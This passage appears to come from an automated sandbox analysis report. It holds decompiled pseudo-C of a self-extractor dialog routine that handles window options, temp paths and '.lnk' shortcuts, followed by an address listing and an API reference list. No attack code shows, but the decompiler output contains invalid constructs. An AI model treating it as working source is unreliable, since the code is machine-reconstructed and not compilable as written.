											_push(__edi);
											_push(__eax);
											_push( *(__ebp + 8));
											__eax = E00C7D78F(__ebp);
											goto L175;
										}
										L98:
										__eflags = __ebx - 9;
										if(__ebx != 9) {
											goto L175;
										}
										L99:
										_push(1);
										goto L103;
									}
									L87:
									__eax = __ebp - 0x588a;
									_push(0x3e);
									_push(__ebp - 0x588a);
									__eax = E00C822C6(__ecx);
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax == 0) {
										L96:
										__eax =  *(__ebp - 0x14);
										goto L97;
									}
									L88:
									_t103 = __eax + 2; // 0x2
									__ecx = _t103;
									 *(__ebp - 0x14) = _t103;
									__ecx = 0;
									 *__eax = __cx;
									__eax = __ebp - 0x10c;
									_push(0x64);
									_push(__ebp - 0x10c);
									__eax = __ebp - 0x588a;
									_push(__ebp - 0x588a);
									__eax = E00C7AF98();
									 *(__ebp - 0x20) = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										goto L96;
									}
									L89:
									__esi = __eax;
									while(1) {
										L90:
										__eflags =  *(__ebp - 0x10c);
										if( *(__ebp - 0x10c) == 0) {
											goto L96;
										}
										L91:
										__eax = __ebp - 0x10c;
										__eax = E00C71FBB(__ebp - 0x10c, L"HIDE");
										__eax =  ~__eax;
										asm("sbb eax, eax");
										__edi = __edi & __eax;
										__eax = __ebp - 0x10c;
										__eax = E00C71FBB(__ebp - 0x10c, L"MAX");
										__eflags = __eax;
										if(__eax == 0) {
											_push(3);
											_pop(__edi);
										}
										__eax = __ebp - 0x10c;
										__eax = E00C71FBB(__ebp - 0x10c, L"MIN");
										__eflags = __eax;
										if(__eax == 0) {
											_push(6);
											_pop(__edi);
										}
										_push(0x64);
										__eax = __ebp - 0x10c;
										_push(__ebp - 0x10c);
										_push(__esi);
										__esi = E00C7AF98();
										__eflags = __esi;
										if(__esi != 0) {
											continue;
										} else {
											goto L96;
										}
									}
									goto L96;
								case 7:
									goto L0;
								case 8:
									L127:
									__eflags = __ebx - 3;
									if(__ebx == 3) {
										__eflags =  *(__ebp - 0x588c) - __di;
										if(__eflags != 0) {
											__eax = __ebp - 0x588c;
											_push(__ebp - 0x588c);
											__eax = E00C87625(__ebx, __edi);
											_pop(__ecx);
											 *0xcbfc9c = __eax;
										}
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										 *0xcbfc98 = E00C7B48E(__ecx, __edx, __eflags);
									}
									 *0xcac576 = 1;
									goto L175;
								case 9:
									L132:
									__eflags = __ebx - 6;
									if(__ebx != 6) {
										goto L175;
									}
									L133:
									__eax = 0;
									 *(__ebp - 0x2844) = __ax;
									__eax =  *(__ebp - 0x1b894) & 0x0000ffff;
									__eax = E00C879E9( *(__ebp - 0x1b894) & 0x0000ffff);
									__eflags = __eax - 0x50;
									if(__eax == 0x50) {
										 *(__ebp - 0x14) = 2;
										__eax = 0xcbcb82;
									} else {
										__eflags = __eax - 0x54;
										if(__eax == 0x54) {
											 *(__ebp - 0x14) = 7;
											__eax = 0xcbbb82;
										} else {
											 *(__ebp - 0x14) = 0x10;
											__eax = 0xcbdb82;
										}
									}
									__esi = 0x800;
									__ebp - 0x2844 = E00C70602(__ebp - 0x2844, __ebp - 0x2844, 0x800);
									__eax = 0;
									 *(__ebp - 0x9894) = __ax;
									 *(__ebp - 0x1844) = __ax;
									__ebp - 0x19894 = __ebp - 0x688c;
									__eax = E00C70602(__ebp - 0x688c, __ebp - 0x19894, 0x800);
									_push(0x22);
									_pop(__ebx);
									__eflags =  *(__ebp - 0x688c) - __bx;
									if( *(__ebp - 0x688c) != __bx) {
										L141:
										__ebp - 0x688c = E00C6A231(__ebp - 0x688c);
										__eflags = __al;
										if(__al != 0) {
											goto L160;
										}
										L142:
										__ax =  *(__ebp - 0x688c);
										__esi = __ebp - 0x688c;
										__ebx = __edi;
										__eflags = __ax;
										if(__ax == 0) {
											L159:
											__esi = 0x800;
											goto L160;
										}
										L143:
										__edi = __ax & 0x0000ffff;
										do {
											L144:
											_push(0x20);
											_pop(__eax);
											__eflags = __di - __ax;
											if(__di == __ax) {
												L146:
												__eax = 0;
												__esi->i = __ax;
												__ebp - 0x688c = E00C6A231(__ebp - 0x688c);
												__eflags = __al;
												if(__al == 0) {
													L155:
													__esi->i = __di;
													goto L156;
												}
												L147:
												__ebp - 0x688c = E00C6A243(__ebp - 0x688c);
												__eax = E00C6A28F(__eax);
												__eflags = __al;
												if(__al != 0) {
													goto L155;
												}
												L148:
												_push(0x2f);
												_pop(__ecx);
												__eax =  &(__esi->i);
												__ebx = __esi;
												__eflags = __di - __cx;
												if(__di != __cx) {
													L150:
													_push(0x20);
													__esi = __eax;
													_pop(__eax);
													while(1) {
														L152:
														__eflags = __esi->i - __ax;
														if(__esi->i != __ax) {
															break;
														}
														L151:
														__esi =  &(__esi->i);
														__eflags = __esi;
													}
													L153:
													__ecx = __ebp - 0x1844;
													__eax = __esi;
													__edx = 0x400;
													L154:
													__eax = E00C70602(__ecx, __eax, __edx);
													 *__ebx = __di;
													goto L156;
												}
												L149:
												 *(__ebp - 0x1844) = __cx;
												__edx = 0x3ff;
												__ecx = __ebp - 0x1842;
												goto L154;
											}
											L145:
											_push(0x2f);
											_pop(__eax);
											__eflags = __di - __ax;
											if(__di != __ax) {
												goto L156;
											}
											goto L146;
											L156:
											__esi =  &(__esi->i);
											__eax = __esi->i & 0x0000ffff;
											__edi = __esi->i & 0x0000ffff;
											__eflags = __ax;
										} while (__ax != 0);
										__esi = 0x800;
										__eflags = __ebx;
										if(__ebx != 0) {
											__eax = 0;
											 *__ebx = __ax;
										}
										goto L160;
									} else {
										L139:
										__ebp - 0x19892 = __ebp - 0x688c;
										E00C70602(__ebp - 0x688c, __ebp - 0x19892, 0x800) = __ebp - 0x688a;
										_push(__ebx);
										_push(__ebp - 0x688a);
										__eax = E00C822C6(__ecx);
										_pop(__ecx);
										_pop(__ecx);
										__eflags = __eax;
										if(__eax != 0) {
											__ecx = 0;
											 *__eax = __cx;
											__ebp - 0x1844 = E00C70602(__ebp - 0x1844, __ebp - 0x1844, 0x400);
										}
										L160:
										__eflags =  *((short*)(__ebp - 0x11894));
										if( *((short*)(__ebp - 0x11894)) != 0) {
											__ebp - 0x9894 = __ebp - 0x11894;
											__eax = E00C6B6C4(__ebp - 0x11894, __ebp - 0x9894, __esi);
										}
										__ebp - 0xb894 = __ebp - 0x688c;
										__eax = E00C6B6C4(__ebp - 0x688c, __ebp - 0xb894, __esi);
										__eflags =  *(__ebp - 0x2844);
										if(__eflags == 0) {
											__ebp - 0x2844 = E00C7B425(__ecx, __ebp - 0x2844,  *(__ebp - 0x14));
										}
										__ebp - 0x2844 = E00C6B690(__eflags, __ebp - 0x2844, __esi);
										__eflags =  *((short*)(__ebp - 0x17894));
										if(__eflags != 0) {
											__ebp - 0x17894 = __ebp - 0x2844;
											E00C705DA(__eflags, __ebp - 0x2844, __ebp - 0x17894, __esi) = __ebp - 0x2844;
											__eax = E00C6B690(__eflags, __ebp - 0x2844, __esi);
										}
										__ebp - 0x2844 = __ebp - 0xc894;
										__eax = E00C70602(__ebp - 0xc894, __ebp - 0x2844, __esi);
										__eflags =  *(__ebp - 0x13894);
										__eax = __ebp - 0x13894;
										if(__eflags == 0) {
											__eax = __ebp - 0x19894;
										}
										__ebp - 0x2844 = E00C705DA(__eflags, __ebp - 0x2844, __ebp - 0x2844, __esi);
										__eax = __ebp - 0x2844;
										__eflags = E00C6B92D(__ebp - 0x2844);
										if(__eflags == 0) {
											L170:
											__ebp - 0x2844 = E00C705DA(__eflags, __ebp - 0x2844, L".lnk", __esi);
											goto L171;
										} else {
											L169:
											__eflags = __eax;
											if(__eflags == 0) {
												L171:
												__ebx = 0;
												__ebp - 0x2844 = E00C6A0B1(0, __ecx, __edi, __ebp, __ebp - 0x2844, 1, 0);
												__ebp - 0xb894 = __ebp - 0xa894;
												E00C70602(__ebp - 0xa894, __ebp - 0xb894, __esi) = __ebp - 0xa894;
												__eax = E00C6C2E4(__eflags, __ebp - 0xa894);
												__esi =  *(__ebp - 0x1844) & 0x0000ffff;
												__eax = __ebp - 0x1844;
												__edx =  *(__ebp - 0x9894) & 0x0000ffff;
												__edi = __ebp - 0xa894;
												__ecx =  *(__ebp - 0x15894) & 0x0000ffff;
												__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff);
												asm("sbb esi, esi");
												__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff) & __ebp - 0x00001844;
												__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff);
												__eax = __ebp - 0x9894;
												asm("sbb edx, edx");
												__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894;
												__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff);
												__eax = __ebp - 0x15894;
												asm("sbb ecx, ecx");
												__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894;
												 *(__ebp - 0xa894) & 0x0000ffff =  ~( *(__ebp - 0xa894) & 0x0000ffff);
												asm("sbb eax, eax");
												 ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi = __ebp - 0x2844;
												__ebp - 0xb894 = E00C7A48A( ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894, 0, __ebp - 0xb894, __ebp - 0x2844,  ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi, __ecx,  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894, __esi);
												__eflags =  *(__ebp - 0xc894) - __bx;
												if( *(__ebp - 0xc894) != __bx) {
													_push(0);
													__eax = __ebp - 0xc894;
													_push(__ebp - 0xc894);
													_push(5);
													_push(0x1000);
													__eax =  *0xcc308c();
												}
												goto L175;
											}
											goto L170;
										}
									}
								case 0xa:
									L173:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										 *0xcaa470 = 1;
									}
									goto L175;
								case 0xb:
									L81:
									__eax =  *(__ebp - 0x588c) & 0x0000ffff;
									__eax = E00C879E9( *(__ebp - 0x588c) & 0x0000ffff);
									__eflags = __eax - 0x46;
									if(__eax == 0x46) {
										 *0xca8461 = 1;
									} else {
										__eflags = __eax - 0x55;
										if(__eax == 0x55) {
											 *0xca8462 = 1;
										} else {
											__eax = 0;
											 *0xca8461 = __al;
											 *0xca8462 = __al;
										}
									}
									goto L175;
								case 0xc:
									L104:
									 *0xcb7b7a = 1;
									__eax = __eax + 0xcb7b7a;
									_t117 = __esi + 0x39;
									 *_t117 =  *(__esi + 0x39) + __esp;
									__eflags =  *_t117;
									__ebp = 0xffffa774;
									if( *_t117 != 0) {
										_t119 = __ebp - 0x588c; // 0xffff4ee8
										__eax = _t119;
										 *0xc9e728 = E00C71FA7(_t119);
									}
									goto L175;
							}
							L2:
							_push(0x1000);
							_push(_t294);
							_push(_t226);
							_t226 = E00C7AF98();
							_t294 = _t294 + 0x2000;
							_t292 = _t292 - 1;
							if(_t292 != 0) {
								goto L2;
							} else {
								_t295 = _t292;
								goto L4;
							}
						}
						L176:
						 *[fs:0x0] =  *((intOrPtr*)(_t299 - 0xc));
						return _t225;
					}
					L111:
					__eflags =  *0xcac575 - __bl;
					if( *0xcac575 != __bl) {
						goto L175;
					}
					L112:
					__eax = 0;
					 *(__ebp - 0x444) = __ax;
					__eax = __ebp - 0x588c;
					_push(__ebp - 0x588c);
					__eax = E00C822C6(__ecx);
					_pop(__ecx);
					__ecx = 0x2c;
					__eflags = __eax;
					if(__eax != 0) {
						L119:
						__eflags =  *(__ebp - 0x444) - __bx;
						if( *(__ebp - 0x444) == __bx) {
							__ebp - 0x1b894 = __ebp - 0x588c;
							E00C70602(__ebp - 0x588c, __ebp - 0x1b894, 0x1000) = __ebp - 0x19894;
							__ebp - 0x444 = E00C70602(__ebp - 0x444, __ebp - 0x19894, 0x200);
						}
						__ebp - 0x588c = E00C7ADD2(__ebp - 0x588c);
						__eax = 0;
						 *(__ebp - 0x488c) = __ax;
						__ebp - 0x444 = __ebp - 0x588c;
						__eax = E00C7A7E4( *(__ebp + 8), __ebp - 0x588c, __ebp - 0x444, 0x24);
						__eflags = __eax - 6;
						if(__eax != 6) {
							__eax = 0;
							 *0xca8454 = 1;
							 *0xca946a = __ax;
							__eax = EndDialog( *(__ebp + 8), 1);
						}
						goto L175;
					}
					L113:
					__ax =  *(__ebp - 0x588c);
					__esi = __ebx;
					__eflags = __ax;
					if(__ax == 0) {
						goto L119;
					}
					L114:
					__ecx = __ax & 0x0000ffff;
					while(1) {
						L115:
						__eflags = __cx - 0x40;
						if(__cx == 0x40) {
							break;
						}
						L116:
						__eax =  *(__ebp + __esi * 2 - 0x588a) & 0x0000ffff;
						__esi =  &(__esi->i);
						__ecx = __eax;
						__eflags = __ax;
						if(__ax != 0) {
							continue;
						}
						L117:
						goto L119;
					}
					L118:
					__ebp - 0x588a = __ebp - 0x588a + __esi * 2;
					__ebp - 0x444 = E00C70602(__ebp - 0x444, __ebp - 0x444, 0x200);
					__eax = 0;
					__eflags = 0;
					 *(__ebp + __esi * 2 - 0x588c) = __ax;
					goto L119;
					L123:
					__eflags = __ebx - 7;
					if(__ebx == 7) {
						__eflags =  *0xcaa46c - 0x800;
						if( *0xcaa46c == 0x800) {
							 *0xcaa46c = 2;
						}
						 *0xca9468 = 1;
					}
					goto L175;
				}
			}

0x00c7ce87
0x00c7ce87
0x00c7ce87
0x00c7ce8a
0x00000000
0x00000000
0x00c7ce90
0x00c7ce90
0x00c7ce96
0x00c7cea4
0x00c7ceab
0x00c7ceb0
0x00c7ceb2
0x00c7ceb4
0x00c7ceb9
0x00c7ceb9
0x00c7ceb9
0x00c7ced1
0x00c7cede
0x00c7cee3
0x00c7cee5
0x00000000
0x00000000
0x00c7ceb7
0x00c7ceb7
0x00c7ceb7
0x00c7ceb8
0x00c7ceb8
0x00c7cee7
0x00c7cef1
0x00c7cef7
0x00c7cefe
0x00c7d3d9
0x00c7d3d9
0x00c7d3d9
0x00c7d3de
0x00c7d3e2
0x00c7d3e6
0x00c7d3ed
0x00c7d3f4
0x00c7d3f7
0x00c7d3fc
0x00c7d3ff
0x00c7d404
0x00c7c795
0x00c7c79b
0x00c7c7a1
0x00c7c7a1
0x00000000
0x00000000
0x00000000
0x00000000
0x00c7c7bb
0x00c7c7d2
0x00c7c7d6
0x00000000
0x00c7c7d8
0x00000000
0x00c7c7d8
0x00c7c7d6
0x00c7c7dd
0x00c7c7e0
0x00000000
0x00000000
0x00c7c7e6
0x00c7c7e6
0x00000000
0x00c7c7ed
0x00c7c7ed
0x00c7c7f0
0x00c7c803
0x00c7c829
0x00c7c83d
0x00c7c840
0x00c7c84b
0x00c7c98f
0x00c7c98f
0x00c7c98f
0x00c7c99d
0x00c7c9a2
0x00c7c9a4
0x00000000
0x00000000
0x00c7c855
0x00c7c85d
0x00c7c863
0x00c7c869
0x00c7c90f
0x00c7c916
0x00c7c91c
0x00c7c91f
0x00000000
0x00000000
0x00c7c921
0x00c7c928
0x00c7c92e
0x00c7c930
0x00000000
0x00c7c932
0x00c7c932
0x00c7c934
0x00c7c935
0x00c7c939
0x00c7c94d
0x00c7c952
0x00c7c95c
0x00c7c962
0x00c7c965
0x00c7c937
0x00c7c937
0x00c7c938
0x00000000
0x00c7c967
0x00c7c975
0x00c7c97b
0x00c7c97d
0x00c7c989
0x00c7c989
0x00000000
0x00c7c97d
0x00c7c965
0x00c7c930
0x00c7c86f
0x00c7c87e
0x00c7c88b
0x00c7c89c
0x00c7c89f
0x00c7c8a2
0x00c7c8b5
0x00c7c8bc
0x00c7c8c1
0x00c7c8c3
0x00000000
0x00000000
0x00c7c8c9
0x00c7c8d0
0x00c7c8d5
0x00c7c8da
0x00c7c8e6
0x00c7c8eb
0x00c7c8ee
0x00c7c8f5
0x00c7c8f7
0x00c7c8f8
0x00c7c902
0x00c7c908
0x00c7c909
0x00000000
0x00c7c909
0x00c7c8a4
0x00c7c8ab
0x00c7c8b1
0x00c7c8b3
0x00000000
0x00000000
0x00000000
0x00c7c8b3
0x00c7c9aa
0x00c7c9aa
0x00c7c9b4
0x00c7c9b4
0x00000000
0x00000000
0x00c7c9be
0x00c7c9be
0x00c7c9c0
0x00000000
0x00c7c9c6
0x00c7c9c6
0x00c7c9cb
0x00c7c9cd
0x00c7c9d0
0x00c7c9d2
0x00c7c9df
0x00c7c9e4
0x00c7c9e5
0x00c7c9e5
0x00c7c9e6
0x00c7c9e9
0x00c7c9eb
0x00c7c9f5
0x00c7c9f8
0x00c7c9fe
0x00c7ca00
0x00c7c9ed
0x00c7c9ed
0x00c7c9ed
0x00c7ca05
0x00c7ca07
0x00c7ca10
0x00c7ca10
0x00c7ca12
0x00c7ca13
0x00c7ca18
0x00c7ca21
0x00c7ca22
0x00c7ca28
0x00c7ca2d
0x00c7ca30
0x00c7ca32
0x00c7ca4b
0x00c7ca4b
0x00c7ca4d
0x00c7ca54
0x00c7ca59
0x00000000
0x00c7ca4d
0x00c7ca34
0x00c7ca34
0x00c7ca39
0x00c7ca3b
0x00c7ca3d
0x00c7ca3d
0x00c7ca3f
0x00c7ca3f
0x00c7ca42
0x00c7ca44
0x00c7ca49
0x00c7ca4a
0x00000000
0x00c7ca4a
0x00000000
0x00c7ca5f
0x00c7ca5f
0x00c7ca61
0x00c7ca71
0x00c7ca71
0x00000000
0x00000000
0x00c7ca7c
0x00c7ca7c
0x00c7ca7e
0x00000000
0x00000000
0x00c7ca84
0x00c7ca84
0x00c7ca8b
0x00000000
0x00000000
0x00c7ca91
0x00c7ca91
0x00c7ca93
0x00c7ca99
0x00c7ca9b
0x00c7caa2
0x00c7caa3
0x00c7caaa
0x00c7caac
0x00c7caac
0x00c7cab3
0x00c7cab8
0x00c7cabe
0x00c7cac0
0x00000000
0x00c7cac6
0x00c7cac6
0x00c7cac6
0x00c7cac9
0x00c7cacb
0x00c7cacc
0x00c7cacf
0x00c7caf8
0x00c7caf8
0x00c7cafb
0x00c7cbe0
0x00c7cbe9
0x00c7cbee
0x00c7cbee
0x00c7cbf0
0x00c7cbf0
0x00c7cbf2
0x00c7cbf4
0x00c7cbfb
0x00c7cc00
0x00c7cc01
0x00c7cc02
0x00c7cc04
0x00c7cc06
0x00c7cc0a
0x00c7cc0c
0x00c7cc0c
0x00c7cc0e
0x00c7cc0e
0x00c7cc0a
0x00c7cc12
0x00c7cc18
0x00c7cc25
0x00c7cc2c
0x00c7cc3c
0x00c7cc46
0x00c7cc54
0x00c7cc5a
0x00c7cc62
0x00c7cc67
0x00c7cc68
0x00c7cc69
0x00c7cc6b
0x00c7cc7f
0x00c7cc7f
0x00000000
0x00c7cc6b
0x00c7cb01
0x00c7cb01
0x00c7cb04
0x00c7cb11
0x00c7cb11
0x00c7cb14
0x00c7cb16
0x00c7cb17
0x00c7cb19
0x00c7cb1a
0x00c7cb1f
0x00c7cb24
0x00c7cb2a
0x00c7cb2c
0x00c7cb2e
0x00c7cb31
0x00c7cb38
0x00c7cb39
0x00c7cb3f
0x00c7cb40
0x00c7cb43
0x00c7cb44
0x00c7cb45
0x00c7cb4a
0x00c7cb4d
0x00c7cb53
0x00c7cb5c
0x00c7cb5f
0x00c7cb64
0x00c7cb66
0x00c7cb68
0x00c7cb6a
0x00c7cb6a
0x00c7cb6c
0x00c7cb6c
0x00c7cb6e
0x00c7cb6e
0x00c7cb76
0x00c7cb7d
0x00c7cb7f
0x00c7cb86
0x00c7cb8c
0x00c7cb8e
0x00c7cb8f
0x00c7cb97
0x00c7cba6
0x00c7cba6
0x00c7cb97
0x00c7cbb1
0x00c7cbb3
0x00c7cbc2
0x00c7cbc8
0x00c7cbce
0x00c7cbd9
0x00c7cbd9
0x00000000
0x00c7cbce
0x00c7cb06
0x00c7cb06
0x00c7cb0b
0x00000000
0x00000000
0x00000000
0x00c7cb0b
0x00c7cad1
0x00c7cad1
0x00c7cad5
0x00000000
0x00000000
0x00c7cad7
0x00c7cad7
0x00c7cada
0x00c7cadc
0x00c7cadf
0x00000000
0x00000000
0x00c7cae5
0x00c7caee
0x00000000
0x00c7caee
0x00000000
0x00c7cc8a
0x00c7cc8a
0x00c7cc8b
0x00c7cc90
0x00c7cc92
0x00c7cc95
0x00c7cc95
0x00000000
0x00c7cccb
0x00c7cccb
0x00c7ccd2
0x00c7ccd4
0x00c7ccd4
0x00c7ccd6
0x00c7cd05
0x00c7cd05
0x00c7cd0b
0x00000000
0x00c7cd0b
0x00c7ccd8
0x00c7ccd8
0x00c7ccd8
0x00c7ccdb
0x00c7ccf4
0x00c7ccf4
0x00c7ccfa
0x00c7ccfa
0x00000000
0x00c7ccfa
0x00c7ccdd
0x00c7ccdd
0x00c7ccdd
0x00c7cce0
0x00000000
0x00000000
0x00c7cce2
0x00c7cce2
0x00c7cce2
0x00c7cce5
0x00000000
0x00000000
0x00c7cceb
0x00c7cceb
0x00000000
0x00000000
0x00c7cd58
0x00c7cd58
0x00c7cd5a
0x00c7cd61
0x00c7cd62
0x00c7cd68
0x00c7cd70
0x00c7cd72
0x00c7cd75
0x00c7ce25
0x00c7ce25
0x00c7ce29
0x00c7ce38
0x00c7ce38
0x00c7ce3c
0x00000000
0x00000000
0x00c7ce42
0x00c7ce42
0x00c7ce45
0x00000000
0x00000000
0x00c7ce4b
0x00c7ce4b
0x00c7ce4b
0x00c7ce4d
0x00c7ce4e
0x00c7ce4e
0x00c7ce4f
0x00c7ce50
0x00c7ce53
0x00000000
0x00c7ce53
0x00c7ce2b
0x00c7ce2b
0x00c7ce2e
0x00000000
0x00000000
0x00c7ce34
0x00c7ce34
0x00000000
0x00c7ce34
0x00c7cd7b
0x00c7cd7b
0x00c7cd81
0x00c7cd83
0x00c7cd84
0x00c7cd89
0x00c7cd8a
0x00c7cd8b
0x00c7cd8d
0x00c7ce22
0x00c7ce22
0x00000000
0x00c7ce22
0x00c7cd93
0x00c7cd93
0x00c7cd93
0x00c7cd96
0x00c7cd99
0x00c7cd9b
0x00c7cd9e
0x00c7cda4
0x00c7cda6
0x00c7cda7
0x00c7cdad
0x00c7cdae
0x00c7cdb3
0x00c7cdb6
0x00c7cdb8
0x00000000
0x00000000
0x00c7cdba
0x00c7cdba
0x00c7cdbc
0x00c7cdbc
0x00c7cdbc
0x00c7cdc4
0x00000000
0x00000000
0x00c7cdc6
0x00c7cdcb
0x00c7cdd2
0x00c7cdd7
0x00c7cdde
0x00c7cde0
0x00c7cde2
0x00c7cde9
0x00c7cdee
0x00c7cdf0
0x00c7cdf2
0x00c7cdf4
0x00c7cdf4
0x00c7cdfa
0x00c7ce01
0x00c7ce06
0x00c7ce08
0x00c7ce0a
0x00c7ce0c
0x00c7ce0c
0x00c7ce0d
0x00c7ce0f
0x00c7ce15
0x00c7ce16
0x00c7ce1c
0x00c7ce1e
0x00c7ce20
0x00000000
0x00000000
0x00000000
0x00000000
0x00c7ce20
0x00000000
0x00000000
0x00000000
0x00000000
0x00c7d030
0x00c7d030
0x00c7d033
0x00c7d035
0x00c7d03c
0x00c7d03e
0x00c7d044
0x00c7d045
0x00c7d04a
0x00c7d04b
0x00c7d04b
0x00c7d050
0x00c7d053
0x00c7d059
0x00c7d059
0x00c7d05e
0x00000000
0x00000000
0x00c7d06a
0x00c7d06a
0x00c7d06d
0x00000000
0x00000000
0x00c7d073
0x00c7d073
0x00c7d075
0x00c7d07c
0x00c7d084
0x00c7d08a
0x00c7d08d
0x00c7d0b0
0x00c7d0b7
0x00c7d08f
0x00c7d08f
0x00c7d092
0x00c7d0a2
0x00c7d0a9
0x00c7d094
0x00c7d094
0x00c7d09b
0x00c7d09b
0x00c7d092
0x00c7d0bc
0x00c7d0ca
0x00c7d0cf
0x00c7d0d1
0x00c7d0d8
0x00c7d0e7
0x00c7d0ee
0x00c7d0f3
0x00c7d0f5
0x00c7d0f6
0x00c7d0fd
0x00c7d149
0x00c7d150
0x00c7d155
0x00c7d157
0x00000000
0x00000000
0x00c7d15d
0x00c7d15d
0x00c7d164
0x00c7d16a
0x00c7d16c
0x00c7d16f
0x00c7d221
0x00c7d221
0x00000000
0x00c7d221
0x00c7d175
0x00c7d175
0x00c7d178
0x00c7d178
0x00c7d178
0x00c7d17a
0x00c7d17b
0x00c7d17e
0x00c7d188
0x00c7d188
0x00c7d18a
0x00c7d194
0x00c7d199
0x00c7d19b
0x00c7d1fd
0x00c7d1fd
0x00000000
0x00c7d1fd
0x00c7d19d
0x00c7d1a4
0x00c7d1aa
0x00c7d1af
0x00c7d1b1
0x00000000
0x00000000
0x00c7d1b3
0x00c7d1b3
0x00c7d1b5
0x00c7d1b6
0x00c7d1b9
0x00c7d1bb
0x00c7d1be
0x00c7d1d4
0x00c7d1d4
0x00c7d1d6
0x00c7d1d8
0x00c7d1de
0x00c7d1de
0x00c7d1de
0x00c7d1e1
0x00000000
0x00000000
0x00c7d1db
0x00c7d1db
0x00c7d1db
0x00c7d1db
0x00c7d1e3
0x00c7d1e3
0x00c7d1e9
0x00c7d1eb
0x00c7d1f0
0x00c7d1f3
0x00c7d1f8
0x00000000
0x00c7d1f8
0x00c7d1c0
0x00c7d1c0
0x00c7d1c7
0x00c7d1cc
0x00000000
0x00c7d1cc
0x00c7d180
0x00c7d180
0x00c7d182
0x00c7d183
0x00c7d186
0x00000000
0x00000000
0x00000000
0x00c7d200
0x00c7d200
0x00c7d203
0x00c7d206
0x00c7d208
0x00c7d208
0x00c7d211
0x00c7d216
0x00c7d218
0x00c7d21a
0x00c7d21c
0x00c7d21c
0x00000000
0x00c7d0ff
0x00c7d0ff
0x00c7d107
0x00c7d113
0x00c7d119
0x00c7d11a
0x00c7d11b
0x00c7d120
0x00c7d121
0x00c7d122
0x00c7d124
0x00c7d12a
0x00c7d12c
0x00c7d13f
0x00c7d13f
0x00c7d226
0x00c7d226
0x00c7d22e
0x00c7d238
0x00c7d23f
0x00c7d23f
0x00c7d24c
0x00c7d253
0x00c7d258
0x00c7d260
0x00c7d26c
0x00c7d26c
0x00c7d279
0x00c7d27e
0x00c7d286
0x00c7d290
0x00c7d29d
0x00c7d2a4
0x00c7d2a4
0x00c7d2b1
0x00c7d2b8
0x00c7d2bd
0x00c7d2c5
0x00c7d2cb
0x00c7d2cd
0x00c7d2cd
0x00c7d2e2
0x00c7d2e7
0x00c7d2f3
0x00c7d2f5
0x00c7d306
0x00c7d313
0x00000000
0x00c7d2f7
0x00c7d2f7
0x00c7d302
0x00c7d304
0x00c7d318
0x00c7d318
0x00c7d324
0x00c7d331
0x00c7d33d
0x00c7d344
0x00c7d349
0x00c7d350
0x00c7d356
0x00c7d35d
0x00c7d363
0x00c7d36a
0x00c7d36c
0x00c7d36e
0x00c7d370
0x00c7d372
0x00c7d378
0x00c7d37a
0x00c7d37c
0x00c7d37e
0x00c7d384
0x00c7d386
0x00c7d390
0x00c7d393
0x00c7d399
0x00c7d3a8
0x00c7d3ad
0x00c7d3b4
0x00c7d3b6
0x00c7d3b7
0x00c7d3bd
0x00c7d3be
0x00c7d3c0
0x00c7d3c5
0x00c7d3c5
0x00000000
0x00c7d3b4
0x00000000
0x00c7d304
0x00c7d2f5
0x00000000
0x00c7d3cd
0x00c7d3cd
0x00c7d3d0
0x00c7d3d2
0x00c7d3d2
0x00000000
0x00000000
0x00c7cd17
0x00c7cd17
0x00c7cd1f
0x00c7cd25
0x00c7cd28
0x00c7cd4c
0x00c7cd2a
0x00c7cd2a
0x00c7cd2d
0x00c7cd40
0x00c7cd2f
0x00c7cd2f
0x00c7cd31
0x00c7cd36
0x00c7cd36
0x00c7cd2d
0x00000000
0x00000000
0x00c7ce5d
0x00c7ce5d
0x00c7ce5e
0x00c7ce63
0x00c7ce63
0x00c7ce63
0x00c7ce66
0x00c7ce6b
0x00c7ce71
0x00c7ce71
0x00c7ce7d
0x00c7ce7d
0x00000000
0x00000000
0x00c7c7a2
0x00c7c7a2
0x00c7c7a7
0x00c7c7a8
0x00c7c7a9
0x00c7c7ae
0x00c7c7b4
0x00c7c7b7
0x00000000
0x00c7c7b9
0x00c7c7b9
0x00000000
0x00c7c7b9
0x00c7c7b7
0x00c7d40a
0x00c7d410
0x00c7d418
0x00c7d418
0x00c7cf04
0x00c7cf04
0x00c7cf0a
0x00000000
0x00000000
0x00c7cf10
0x00c7cf10
0x00c7cf12
0x00c7cf19
0x00c7cf21
0x00c7cf22
0x00c7cf27
0x00c7cf28
0x00c7cf29
0x00c7cf2b
0x00c7cf7b
0x00c7cf7b
0x00c7cf82
0x00c7cf90
0x00c7cfa1
0x00c7cfaf
0x00c7cfaf
0x00c7cfbb
0x00c7cfc0
0x00c7cfc2
0x00c7cfd2
0x00c7cfdc
0x00c7cfe1
0x00c7cfe4
0x00c7cfef
0x00c7cff1
0x00c7cff8
0x00c7cffe
0x00c7cffe
0x00000000
0x00c7cfe4
0x00c7cf2d
0x00c7cf2d
0x00c7cf34
0x00c7cf36
0x00c7cf39
0x00000000
0x00000000
0x00c7cf3b
0x00c7cf3b
0x00c7cf3e
0x00c7cf3e
0x00c7cf3e
0x00c7cf42
0x00000000
0x00000000
0x00c7cf44
0x00c7cf44
0x00c7cf4c
0x00c7cf4d
0x00c7cf4f
0x00c7cf52
0x00000000
0x00000000
0x00c7cf54
0x00000000
0x00c7cf54
0x00c7cf56
0x00c7cf61
0x00c7cf6c
0x00c7cf71
0x00c7cf71
0x00c7cf73
0x00000000
0x00c7d009
0x00c7d009
0x00c7d00c
0x00c7d012
0x00c7d018
0x00c7d01a
0x00c7d01a
0x00c7d024
0x00c7d024
0x00000000
0x00c7d00c

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00C7CE9D

Part of subcall function 00C6B690: _wcslen.LIBCMT ref: 00C6B696

_swprintf.LIBCMT ref: 00C7CED1

